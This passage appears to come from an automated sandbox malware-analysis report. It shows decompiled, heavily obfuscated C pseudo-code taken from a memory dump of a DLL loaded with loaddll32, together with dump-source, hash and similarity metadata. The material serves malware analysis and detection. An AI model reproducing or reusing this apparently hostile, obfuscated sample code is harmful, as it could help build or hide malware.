            							_t285 =  *0x6d55d578; // 0x0
            							_t222 =  *0x6d55d594; // 0x0
            							 *((intOrPtr*)(_t222 + 0x14 + _t285 * 4)) = 0x73f;
            							 *0x6d55d578 =  *0x6d55d578 + 1;
            							 *0x6d55d59c =  *0x6d55d59c & 0x00000f1a;
            						}
            						L15:
            						return 0x1eb3;
            					}
            					_t318 =  *(_t272 + _t347);
            					if((_t318 & 0x000000ff) !=  *((intOrPtr*)(_t349 + 0x5c))) {
            						goto L13;
            					}
            					_t225 =  *0x6d55d59c; // 0x0
            					_t355 =  *0x6d55d5c0 - _t225; // 0x0
            					if(_t355 > 0) {
            						_t286 =  *0x6d55d5a8; // 0x0
            						 *(_t286 +  *( *(_t349 + 0x10)) * 4) = ((_t318 & 0x000000ff) +  *0x6d55d5e0 ^  *0x6d55d5d8) %  *(_t286 +  *( *(_t349 + 0x10)) * 4);
            						 *0x6d55d58c =  *0x6d55d58c - 1;
            						 *0x6d55d5b8 =  *(_t349 + 0x38);
            						_t235 =  *(_t349 + 0x28);
            						 *((intOrPtr*)(_t235 + 8 + ( *0x6d55d59c & 0x0000ffff) * 4)) =  *((intOrPtr*)(_t235 + 8 + ( *0x6d55d59c & 0x0000ffff) * 4)) + (( *0x6d55d5c4 & 0x0000ffff) - ( *(_t272 + _t347) & 0x000000ff) ^  *0x6d55d5b4) * ( *0x6d55d5c0 & 0x0000ffff);
            						_t292 =  *(_t235 + 0x1c + _t272 * 4);
            						_t236 =  *0x6d55d594; // 0x0
            						if(_t292 !=  *((intOrPtr*)(_t236 + _t272 * 4))) {
            							goto L15;
            						}
            						_t237 =  *((intOrPtr*)(_t349 + 0x30));
            						_t337 =  *(_t349 + 0x14);
            						_t343 = _t237 + 0x1c + _t292 * 4;
            						do {
            							 *_t343 =  *_t343 | ( *(_t237 + 0x2fb4) ^  *0x6d55d5ac) &  *(_t337 + 0x39d0) |  *0x6d55d598;
            							_t343 =  &(_t343[1]);
            							 *0x6d55d59c = 0x16e1 -  *0x6d55d59c;
            							asm("cdq");
            							_t247 =  *0x6d55d594; // 0x0
            							_t292 = _t292 + 1;
            							 *0x6d55d58a = (( *( *((intOrPtr*)(_t349 + 0x54)) + 0x150a) & 0x0000ffff) % _t272 ^  *(_t272 + _t347) ^ 0x00000086) -  *0x6d55d58a;
            							_t237 =  *((intOrPtr*)(_t349 + 0x30));
            						} while (_t292 ==  *((intOrPtr*)(_t247 + _t272 * 4)));
            						goto L15;
            					}
            					 *( *((intOrPtr*)(_t349 + 0x54)) + _t339 * 2) =  *( *((intOrPtr*)(_t349 + 0x54)) + _t339 * 2) | _t333;
            					_t249 =  *0x6d55d570; // 0x0
            					_t293 =  *0x6d55d5d4; // 0x0
            					asm("cdq");
            					 *(_t249 + _t293 * 4 + 4) = ( *( *((intOrPtr*)( *((intOrPtr*)(_t349 + 0x24)))) + _t347) & 0x000000ff |  *0x6d55d57c) %  *(_t249 + _t293 * 4 + 4);
            					goto L15;
            				}
            				 *(_t349 + 0x20) = _t272 * 0xc;
            				 *(_t349 + 0x34) = _t332 + _t275;
            				_t274 =  *((intOrPtr*)(_t349 + 0x18)) - _t275;
            				do {
            					asm("cdq");
            					 *0x6d55d5d0 = _t332 / ( *0x6d55d5d0 & 0x0000ffff);
            					asm("cdq");
            					_t329 =  *(_t349 + 0x34);
            					 *0x6d55d5d4 = (( *(_t274 +  *(_t349 + 0x34)) & 0x000000ff) + _t332) / _t339;
            					 *0x6d55d580 =  *0x6d55d580 |  *0x6d55d59c & 0x0000ffff;
            					 *((intOrPtr*)( *(_t349 + 0x20) + _t346 + 0x20)) =  *((intOrPtr*)( *(_t349 + 0x20) + _t346 + 0x20)) + ( *_t329 & 0x000000ff) + ( *0x6d55d5c4 & 0x0000ffff);
            					_t298 =  *0x6d55d58a; // 0x0
            					 *0x6d55d5c4 = (_t298 & 0x000000ff) - _t332;
            					 *0x6d55d58a = _t298 + 1;
            					 *((intOrPtr*)( *((intOrPtr*)(_t349 + 0x50)) + _t332 * 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t349 + 0x50)) + _t332 * 4)) + 0x1bc4;
            					_t332 = _t332 + 1;
            					_t339 =  *0x6d55d5d4; // 0x0
            					 *(_t349 + 0x34) =  &(_t329[1]);
            				} while (_t332 > 0x36f);
            				_t333 =  *0x6d55d5cc; // 0x0
            				_t272 =  *(_t349 + 0x58);
            				goto L5;
            			}

            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: cb7b37083b559d9b1f206cd5e2e650df69fc7ae529dcdb41f3e948551ea3bca2
            • Instruction ID: e5e017b1e8e2ba67df08b14f39b3c5992821a9bfc014b72456356dc15210811c
            • Opcode Fuzzy Hash: cb7b37083b559d9b1f206cd5e2e650df69fc7ae529dcdb41f3e948551ea3bca2
            • Instruction Fuzzy Hash: BCB14776608291CFCB46CF28C080A25BBF1FBCA308B56455EE886CBB51D7B5E951CF52
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 67%
            			E6D502E9F(signed char* _a4, intOrPtr* _a8, intOrPtr* _a12, signed int* _a16) {
            				signed int _v4;
            				signed int _v8;
            				intOrPtr _v12;
            				signed int _v16;
            				signed int _t139;
            				intOrPtr _t147;
            				intOrPtr _t148;
            				signed int _t161;
            				signed int _t166;
            				intOrPtr _t171;
            				signed int _t172;
            				intOrPtr _t177;
            				intOrPtr _t181;
            				intOrPtr _t184;
            				signed int _t185;
            				intOrPtr* _t188;
            				signed int _t197;
            				intOrPtr _t198;
            				intOrPtr _t199;
            				intOrPtr _t200;
            				signed char _t201;
            				signed int _t212;
            				intOrPtr _t213;
            				signed int _t217;
            				intOrPtr _t218;
            				signed int _t222;
            				signed int _t223;
            				signed int _t224;
            				intOrPtr* _t226;
            				signed int _t232;
            				signed int _t234;
            				signed int _t236;
            				signed int _t238;
            				signed int _t242;
            				signed int _t255;
            				intOrPtr* _t261;
            				signed int* _t264;
            				signed int _t268;
            				signed short _t269;
            				signed int _t271;
            				signed char* _t274;
            				signed int _t275;
            				signed char* _t278;
            				intOrPtr _t281;
            				signed int* _t283;
            
            				_t283 =  &_v16;
            				_t139 =  *0x6d55d580; // 0x0
            				_t268 = _a16[_t139] &  *0x6d55d5c4 & 0x0000ffff;
            				_t200 =  *0x6d55d5b4; // 0x0
            				_v8 = _t268;
            				_t261 = _a8;
            				_v12 = _t200;
            				_t242 =  *0x6d55d5d4; // 0x0
            				_t212 = 1 / ( *(0x28f + ( *0x28f & 0x000000ff) * 4) & 0x000000ff) & _t200 -  *((intOrPtr*)(_t261 + _t242 * 4));
            				_t147 =  *0x6d55d5e4; // 0x0
            				_t148 = _t147 - 1;
            				_v4 = _t212;
            				_v16 = _t212;
            				 *0x6d55d5e4 = _t148;
            				if(_t212 != _t148) {
            					_t278 = _a4;
            				} else {
            					while(1) {
            						_t177 =  *0x6d55d570; // 0x0
            						_t224 =  *0x6d55d578; // 0x0
            						asm("cdq");
            						_t275 =  *0x6d55d5dc; // 0x0
            						_t181 =  *0x6d55d5c8; // 0x0
            						asm("cdq");
            						_t226 = _a16;
            						 *_t226 =  *_t226 - 1;
            						_push( *( *_t226 + 0x28f) & 0x000000ff);
            						_push(_t275 ^ _v16);
            						_push(1);
            						_push( *(_t181 + ( *0x28f & 0x000000ff) * 4) / _v16);
            						_push( *(_t177 + _t242 * 4) %  *(_t268 + 0x1918));
            						_push( *(_t261 + 0x2c7c) & 0x000005f2);
            						_push( *(_t200 + _t224 * 4) * 0xee5);
            						_t184 = E6D507397();
            						_t278 = _a4;
            						 *((intOrPtr*)(_a16 + ( *_a12 +  *_a12) * 8)) = _t184;
            						_t185 =  *0x6d55d5ac; // 0x0
            						_t255 = _v16;
            						_t232 = 0x28f[_t255] & 0x000000ff;
            						asm("cdq");
            						_t188 = _a8;
            						 *_t188 =  *_t188 + 1;
            						_t234 =  *0x6d55d578; // 0x0
            						_t236 = _v16;
            						_push( *(_a12 + _t236 * 4) * 0x6bd);
            						_push(_t236 ^ 0x000005b2);
            						_push(_t236);
            						_push((_t278[_t234] & 0x000000ff) % ( *0x6d55d5c4 & 0x0000ffff));
            						_push(( *( *_t188 + _t278) & 0x000000ff) %  *0x6d55d580);
            						_push(_t255 / _t232);
            						_push( *(_v12 + _t185 * 8) & _t232);
            						_t197 = E6D507397();
            						_t283 =  &(_t283[0xe]);
            						_t268 = _v8;
            						_t238 = _v16 + 1;
            						 *0x6d55d590 = _t197;
            						_t198 =  *0x6d55d5e4; // 0x0
            						_t199 = _t198 - 1;
            						_v16 = _t238;
            						 *0x6d55d5e4 = _t199;
            						if(_t238 != _t199) {
            							break;
            						}
            						_t242 =  *0x6d55d5d4; // 0x0
            						_t200 = _v12;
            						_t261 = _a8;
            					}
            					_t212 = _v4;
            				}
            				 *_t278 =  *_t278 + 1;
            				_push(0x1b5f);
            				_t269 =  *0x6d55d588; // 0x0
            				_v8 =  *((intOrPtr*)(( *_t278 & 0x000000ff) * 0xc + _t268 + 0x20));
            				_t213 =  *0x6d55d5bc; // 0x0
            				asm("cdq");
            				 *0x6d55d588 = _t269 + 1;
            				_t271 =  *0x6d55d580; // 0x0
            				_t201 =  *0x28f;
            				asm("cdq");
            				 *0x28f = _t201 - 1;
            				_push(_v4);
            				_push( *(_v12 + _t271 * 4) / (0x28f[_t201 & 0x000000ff] & 0x000000ff));
            				_push(_t271);
            				_push((_t269 & 0x0000ffff) %  *(_t213 + 0x53c));
            				_push(0x28f[ *_a16] & 0x000000ff ^ _t212);
            				_push(_v8);
            				_t161 = E6D507397();
            				_t281 = _a8;
            				 *(_t281 + ( *0x28f & 0x000000ff) * 4) = _t161;
            				 *0x28f =  *0x28f + 1;
            				_t217 =  *0x6d55d57c; // 0x0
            				_t218 =  *0x6d55d594; // 0x0
            				 *(_a12 + _t217 * 4) =  *(_a12 + ( *0x28f & 0x000000ff) * 4) /  *(_t218 + ( *0x28f & 0x000000ff) * 4) %  *(_a12 + _t217 * 4);
            				_t166 =  *0x6d55d578; // 0x0
            				_t264 = _a16;
            				 *(_v12 + ( *0x28f & 0x000000ff) * 4) =  *(_v12 + ( *0x28f & 0x000000ff) * 4) | ( *(_v12 + _t166 * 8) ^  *(_v12 + ( *0x28f & 0x000000ff) * 4)) & 0x000014e2;
            				_t274 = _a4;
            				_t171 =  *0x6d55d598; // 0x0
            				 *(_t274 +  *_t264 * 2) =  *(_t274 +  *_t264 * 2) ^ ( *(_t281 + ( *0x28f & 0x000000ff) * 4) |  *(_t171 + _t274));
            				_t222 =  *0x6d55d5e0; // 0x0
            				_t172 =  *0x6d55d5a0; // 0x0
            				_t223 = _t222 + 1;
            				 *0x6d55d5e0 = _t223;
            				_t264[_t223] = _t172;
            				return _t274[0x1130] & 0x000000ff ^  *0x6d55d590;
            			}

            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 306730cc186c76847834ce662c661a6657c211cbc2fc1762fd8ab8bdeaebac21
            • Instruction ID: 09e2ee9bfd17be220a95007f029b5eb8de4c7b509ed759dcc1542cb1d749e692
            • Opcode Fuzzy Hash: 306730cc186c76847834ce662c661a6657c211cbc2fc1762fd8ab8bdeaebac21
            • Instruction Fuzzy Hash: FE91BE762082808FCB5ADF29C490A26BBF1FBCE344F1644AEF9868B351D734A911CF51
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 59%
            			E6D504A20() {
            				intOrPtr _t186;
            				signed int _t208;
            				signed int* _t209;
            				intOrPtr _t210;
            				intOrPtr _t211;
            				signed int _t212;
            				signed int _t215;
            				intOrPtr _t218;
            				signed int _t219;
            				intOrPtr _t220;
            				signed int _t221;
            				signed int _t222;
            				void* _t224;
            				intOrPtr _t225;
            				signed int _t226;
            				intOrPtr _t227;
            				signed int _t228;
            				signed int _t229;
            				signed int _t230;
            				signed int _t232;
            				void* _t233;
            
            				_t210 =  *((intOrPtr*)(_t233 + 0xc));
            				_t5 = _t210 + 0x792; // 0x6d5020ce
            				_t220 = _t5;
            				_t225 =  *((intOrPtr*)(_t233 + 0x18));
            				_t208 =  *((intOrPtr*)(_t233 + 0x14)) + 0xfffffec0;
            				 *((intOrPtr*)(_t233 + 0x18)) =  *(_t233 + 0x30) + 0xfffffcfa;
            				_t232 =  *((intOrPtr*)(_t233 + 0x28)) + 0xffffde17;
            				 *((intOrPtr*)(_t233 + 0x10)) = _t220;
            				 *(_t233 + 0x30) =  *((intOrPtr*)(_t233 + 0x34)) + 0xfffff9ce;
            				_t228 = _t225 + 0xe15;
            				 *((intOrPtr*)(_t233 + 0x20)) =  *(_t233 + 0x24) + 0xfffff726;
            				_t14 = _t210 - 0x1e7b; // 0x6d4ffac1
            				 *((intOrPtr*)(_t233 + 0x1c)) = _t14;
            				_t211 = _t225 + 0x8ce;
            				 *((intOrPtr*)(_t233 + 0x34)) = _t211;
            				if(_t228 <= _t208 + 0x32) {
            					_t209 =  *(_t233 + 0x44);
            					if(_t220 == (_t232 ^ _t208) + 0x2597) {
            						 *_t209 = (_t211 - 0x00002749 ^ 0x0000252e) *  *_t209;
            					}
            					_t55 =  &(_t209[0x1d]); // 0x55d5e5f
            					_t221 =  *_t55;
            					_t56 =  &(_t209[0x45]); // 0x55d5dc35
            					if(_t209[7] == (_t221 | _t228) *  *_t56) {
            						_t58 =  &(_t209[0x35]); // 0x55d598a1
            						_t226 =  *_t58;
            						_t59 =  &(_t209[0x4c]); // 0xf180cb32
            						_t212 =  *_t59;
            						_t60 =  &(_t209[0x49]); // 0x754c8a2e
            						_t222 =  *_t60;
            						_t61 =  &(_t209[0x39]); // 0x2444886d
            						_t229 =  *_t61;
            						_t62 =  &(_t209[0x1d]); // 0x55d5e5f
            						_t209[0x13] = _t209[0x13] - (_t226 * _t221 | _t212);
            						_push(_t212 &  *_t62 & 0x000029b2);
            						_push(_t226 |  *(_t233 + 0x24));
            						_t66 =  &(_t209[0x3e]); // 0x1d7ccd3b
            						_push( *_t66 ^ _t222);
            						_push( *(_t233 + 0x3c) - _t229 ^ 0x000029b2);
            						_t68 =  &(_t209[0x3a]); // 0xd5a8a140
            						_t69 =  &(_t209[0xf]); // 0x478f0f1c
            						_push( *_t68 &  *_t69);
            						_t70 =  &(_t209[0x45]); // 0x55d5dc35
            						_push( *_t70 -  *((intOrPtr*)(_t233 + 0x2c)) &  *(_t233 + 0x30));
            						_push( *(_t233 + 0x4c) |  *(_t233 + 0x44));
            						_t75 =  &(_t209[2]); // 0x548b30c4
            						_push( *_t75 + 0x00001e7b ^ 0x00002b78);
            						_push(( *(_t233 + 0x3c) ^ 0x00001eee) - _t222);
            						_push( *((intOrPtr*)(_t233 + 0x34)) -  *(_t233 + 0x44) | 0x00002ea5);
            						_t79 = _t229 + 0x2749; // 0x2444afb6
            						_t80 =  &(_t209[0x64]); // 0x5b60f28
            						_push( *_t80 * _t226 & 0x00002749);
            						_t81 =  &(_t209[0x31]); // 0x1efe1024
            						_t82 =  &(_t209[7]); // 0x38244c0b
            						_push( *_t81 -  *_t82);
            						_push( *(_t233 + 0x50) * 0x1df3);
            						_t84 =  &(_t209[0x1d]); // 0x55d5e5f
            						_push( *_t84 * _t232 *  *(_t233 + 0x6c));
            						_push(_t209);
            						E6D515901();
            						_t86 =  &(_t209[0x2f]); // 0xfe34868d
            						_t88 =  &(_t209[0x35]); // 0x55d598a1
            						_t215 =  *_t88;
            						_t209[7] = _t209[7] ^  *_t86 *  *(_t233 + 0x58) - 0x000024ad;
            						_t91 =  &(_t209[0x34]); // 0xf22
            						_t92 =  &(_t209[4]); // 0x44892c24
            						_push( *_t91 *  *_t92 -  *((intOrPtr*)(_t233 + 0x60)));
            						_t94 =  &(_t209[0x24]); // 0xb70f2424
            						_t96 =  &(_t209[0x68]); // 0xc9b60fd1
            						_push(( *_t94 ^  *(_t233 + 0x74)) & _t215);
            						_t99 =  &(_t209[0x5e]); // 0x8d142454
            						_t100 =  &(_t209[0x4c]); // 0xf180cb32
            						_push(_t215 -  *_t96);
            						_push(((_t232 - 0x000029d1 ^  *(_t233 + 0x58) | _t232) ^  *_t99) *  *_t100);
            						_t101 =  &(_t209[0x52]); // 0x190cfe
            						_push(( *_t101 & 0x0000260d) + 0x2ac3);
            						_t103 =  &(_t209[0x1a]); // 0x820f1c24
            						_push( *(_t233 + 0x88) +  *(_t233 + 0x88) -  *_t103);
            						_t104 =  &(_t209[0x64]); // 0x5b60f28
            						_push(_t209);
            						_push( *_t104 ^  *(_t233 + 0x88));
            						E6D504D09();
            						_t233 = _t233 + 0x60;
            					}
            				} else {
            					_t230 =  *(_t233 + 0x44);
            					 *((intOrPtr*)(_t230 + 0x154)) = 9;
            					_t21 = _t230 + 0xbc; // 0xfe34868d
            					_t186 =  *_t21;
            					if(_t186 <= 0x2ab3) {
            						 *((intOrPtr*)(_t230 + 0x90)) =  *((intOrPtr*)(_t230 + 0x90)) + _t186 + 0xffffda69;
            					}
            					_t24 = _t230 + 0x138; // 0x161bb8
            					_t25 = _t230 + 0xe0; // 0x55d5b4a0
            					_t26 = _t230 + 0x144; // 0x81466d55
            					 *((intOrPtr*)( *_t25 +  *_t24 * 4)) =  *((intOrPtr*)( *_t25 +  *_t24 * 4)) +  *_t26;
            					_t31 = _t230 + 0x50; // 0x13085
            					_t218 =  *_t31;
            					 *((intOrPtr*)(_t230 + 0x48)) =  *((intOrPtr*)(_t218 + 0x90));
            					_push(_t225 + 0x792);
            					 *((intOrPtr*)(_t218 + 0x90)) =  *((intOrPtr*)(_t218 + 0x90)) + 1;
            					_t219 =  *(_t233 + 0x30);
            					_push( *((intOrPtr*)(_t233 + 0x1c)) + 0x32);
            					_push(_t225 + 0x71c);
            					_t227 =  *((intOrPtr*)(_t233 + 0x1c));
            					_push(_t225 + 0x8ce);
            					_t224 = _t219 + 0xe9d;
            					_push( *((intOrPtr*)(_t233 + 0x2c)) + 0x2749);
            					_push(_t227 - 0xdf);
            					_push(_t224);
            					_push(_t219 + 0xd85);
            					_push(_t232 + 0x2749);
            					_push(_t224);
            					_push(_t208 - 0xa7f);
            					_push( *((intOrPtr*)(_t233 + 0x48)) + 0x24ad);
            					_push( *((intOrPtr*)(_t233 + 0x70)));
            					_push(_t227);
            					_push(_t232 + 0x1e7b);
            					_push(_t230);
            					E6D515901();
            					_t233 = _t233 + 0x40;
            					 *(_t230 + 0x8c) =  *( *_t230 + 0x1c) * 0x6427d784;
            				}
            				return  *(_t233 + 0x30) + 0x71c;
            			}

            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e2e343c06b778256d4fa8a41ddfdbf0324c60263a2836af7718262e99c3cfe4c
            • Instruction ID: e2fc452fc6bf2717530ef5b3c975506b7ff1d455b62df29c1364adc5763cd327
            • Opcode Fuzzy Hash: e2e343c06b778256d4fa8a41ddfdbf0324c60263a2836af7718262e99c3cfe4c
            • Instruction Fuzzy Hash: 8C91F372218601AFD754CF68C9C5E9BB7F8FB88304F08496AF999CB256D734E9018B61
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E6D519545() {
            				void* _t145;
            				void* _t171;
            				signed int _t183;
            				unsigned char _t184;
            				intOrPtr _t185;
            				signed int _t193;
            				intOrPtr _t197;
            				signed int _t199;
            				void* _t201;
            				signed int _t204;
            				void* _t208;
            				signed char _t213;
            				signed int _t215;
            				signed int _t217;
            				intOrPtr _t218;
            				intOrPtr _t219;
            				signed int _t220;
            				intOrPtr _t221;
            				intOrPtr _t222;
            				intOrPtr _t223;
            				signed int _t224;
            				signed int _t225;
            				signed int _t226;
            				void* _t227;
            				void* _t230;
            
            				_t223 =  *((intOrPtr*)(_t230 + 0x2c));
            				_t224 = 0;
            				 *(_t230 + 0x10) = 0;
            				_t218 =  *((intOrPtr*)(_t223 + 0x8c));
            				_t185 = _t218;
            				_t183 =  *(_t223 + 0x4c) ^ 0x0000260d;
            				 *((intOrPtr*)(_t230 + 0x1c)) = _t218;
            				 *((intOrPtr*)(_t230 + 0x14)) = _t185;
            				 *(_t223 + 0x38) =  *( *((intOrPtr*)(_t223 + 0x74)) + 0x90) ^  *(_t223 + 0x38) ^ 0x000029d1;
            				 *(_t230 + 0x20) = _t183;
            				if(_t183 <  *((intOrPtr*)(_t230 + 0x44))) {
            					do {
            						 *(_t223 + 0xd0) =  *(_t223 + 0xd0) | 0xfffffee8;
            						 *( *((intOrPtr*)(_t223 + 0x14)) + _t183 + _t218) =  *((intOrPtr*)(_t183 +  *((intOrPtr*)(_t230 + 0x54)))) -  *((intOrPtr*)(_t230 + 0x50)) ^  *(_t230 + 0x4c);
            						if( *((intOrPtr*)(_t230 + 0x48)) != 8) {
            							 *(_t230 + 0x30) =  *( *((intOrPtr*)(_t223 + 0x14)) + _t183 + _t218) & 0x00000001;
            							_t197 =  *((intOrPtr*)(_t230 + 0x48));
            							 *((intOrPtr*)(_t230 + 0x18)) = _t197;
            							if(_t197 != 0) {
            								_t221 =  *((intOrPtr*)(_t230 + 0x14));
            								_t184 =  *(_t230 + 0x30);
            								 *(_t230 + 0x24) =  *(_t230 + 0x34) *  *(_t230 + 0x40);
            								do {
            									_t199 =  *(_t223 + 0x90);
            									_t213 = _t184 >> _t197 - 0x00000001 & ( *(_t223 + 0x1c) & 0x000000ff) * 0x000000c5;
            									 *(_t223 + 0xf8) = _t199 |  *(_t230 + 0x34);
            									 *((intOrPtr*)(_t223 + 0xe4)) =  *((intOrPtr*)(_t223 + 0xe4)) -  *(_t230 + 0x24);
            									_t226 = _t224 + 1;
            									 *(_t230 + 0x10) = _t226;
            									if(_t224 == 0) {
            										_t145 = 0xffffffb8;
            										 *((intOrPtr*)(_t223 + 0xe8)) =  *((intOrPtr*)(_t223 + 0xe8)) + _t145 - _t223;
            										 *(_t223 + 0x90) =  *(_t223 + 0x24) * 0x29b2 + _t199;
            										 *((intOrPtr*)(_t223 + 0x100)) =  *(_t223 + 0x1c) +  *((intOrPtr*)(_t230 + 0x2c));
            										 *(_t221 +  *((intOrPtr*)(_t223 + 0x14))) = _t213;
            										_t201 =  *((intOrPtr*)( *((intOrPtr*)(_t223 + 0x88)) + 0x1c)) - 0x76;
            										if(_t201 != 0x2597) {
            											_t217 =  *(_t223 + 0x1d4) -  *(_t230 + 0x40);
            											_t171 = 0x2597 - _t201;
            											do {
            												_t171 = _t171 - 1;
            											} while (_t171 != 0);
            											 *(_t223 + 0x130) = _t217;
            										}
            										 *(_t223 + 0x24) =  *(_t223 + 0x1d4) | 0x00002ea5;
            									} else {
            										 *(_t223 + 0x24) =  *(_t223 + 0x24) - ( *(_t223 + 0x24) ^ 0x00002b78);
            										 *(_t223 + 0x24) =  *( *((intOrPtr*)(_t223 + 0x50)) + 0x90) ^  *(_t223 + 0x24) ^ 0x00002749;
            										 *( *((intOrPtr*)(_t223 + 0x14)) + _t221) =  *( *((intOrPtr*)(_t223 + 0x14)) + _t221) +  *( *((intOrPtr*)(_t223 + 0x14)) + _t221) | _t213;
            										 *( *((intOrPtr*)(_t223 + 0x50)) + 0xe4) =  *( *((intOrPtr*)(_t223 + 0x50)) + 0xe4) | 0x00003356;
            									}
            									 *(_t223 + 0x168) =  *(_t223 + 0x168) |  *( *((intOrPtr*)(_t223 + 0x10)) + 0x130) | 0x00002ab3;
            									 *(_t223 + 0x17c) =  *(_t223 + 0x17c) ^ ( *( *((intOrPtr*)(_t223 + 0x88)) + 0x90) | 0x000029b2);
            									if(_t226 ==  *( *((intOrPtr*)(_t223 + 8)) + 0x80) * 0x46204968) {
            										_t227 = 0x2b78;
            										if( *((intOrPtr*)( *((intOrPtr*)(_t223 + 0x74)) + 0x1c)) + 0x56d > 0x2b78) {
            											_t204 =  *(_t223 + 0x130);
            											_t215 =  *(_t223 + 0x48);
            											_t222 =  *((intOrPtr*)(_t223 + 0x74));
            											do {
            												_t215 = _t215 ^ _t204;
            												_t204 = _t204 - 1;
            												 *(_t223 + 0x48) = _t215;
            												_t227 = _t227 + 1;
            												 *(_t223 + 0x130) = _t204;
            											} while (_t227 <  *((intOrPtr*)(_t222 + 0x1c)) + 0x56d);
            											_t221 =  *((intOrPtr*)(_t230 + 0x14));
            										}
            										_t221 = _t221 + 1;
            										 *(_t230 + 0x10) =  *(_t223 + 0x1c) ^ 0x0000260d;
            										 *((intOrPtr*)(_t230 + 0x14)) = _t221;
            									}
            									_t197 =  *((intOrPtr*)(_t230 + 0x18)) - 1;
            									_t224 =  *(_t230 + 0x10);
            									 *(_t223 + 0xd0) =  *(_t223 + 0xd0) ^  *(_t223 + 0x3c) + ( *(_t230 + 0x38) & 0x0000ffff);
            									 *((intOrPtr*)(_t230 + 0x18)) = _t197;
            								} while (_t197 != 0);
            								_t218 =  *((intOrPtr*)(_t230 + 0x1c));
            								_t183 =  *(_t230 + 0x20);
            							}
            						}
            						_t225 =  *(_t223 + 0x1d4);
            						_t208 = 0x260d;
            						if(( *(_t225 + 0x4c) ^ 0x00000002) != 0x260d) {
            							_t220 =  *(_t223 + 0x13c) * 0x260d;
            							_t193 =  *(_t223 + 0x3c);
            							do {
            								_t193 = _t193 | _t220;
            								_t208 = _t208 + 1;
            								 *(_t223 + 0x3c) = _t193;
            							} while (_t208 != ( *(_t225 + 0x4c) ^ 0x00000002));
            							_t218 =  *((intOrPtr*)(_t230 + 0x1c));
            						}
            						_t224 =  *(_t230 + 0x10);
            						_t183 = _t183 + 1;
            						 *(_t230 + 0x20) = _t183;
            					} while (_t183 <  *((intOrPtr*)(_t230 + 0x44)));
            					_t185 =  *((intOrPtr*)(_t230 + 0x14));
            				}
            				if( *((intOrPtr*)(_t230 + 0x48)) != 8) {
            					_t219 = _t185;
            					 *(_t223 + 0x110) =  *(_t223 + 0x110) |  *(_t223 + 0x2c) ^ 0x00002c90;
            					 *((intOrPtr*)( *((intOrPtr*)(_t223 + 0x124)) + 0x24)) =  *((intOrPtr*)(_t223 + 0xe4)) -  *((intOrPtr*)(_t230 + 0x2c));
            					 *((intOrPtr*)(_t223 + 0xc4)) = 0x29b2;
            				} else {
            					_t219 = _t218 +  *((intOrPtr*)(_t230 + 0x44));
            				}
            				return _t219;
            			}





























            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 757f7a324926c80984bd9b3dc6681fd882949ffe4824597ca1a24a6f21f33aa9
            • Instruction ID: e29ed3be8f6fb02d3e7596c7240c8091096109f32582eef2ed6e49c3be3813ae
            • Opcode Fuzzy Hash: 757f7a324926c80984bd9b3dc6681fd882949ffe4824597ca1a24a6f21f33aa9
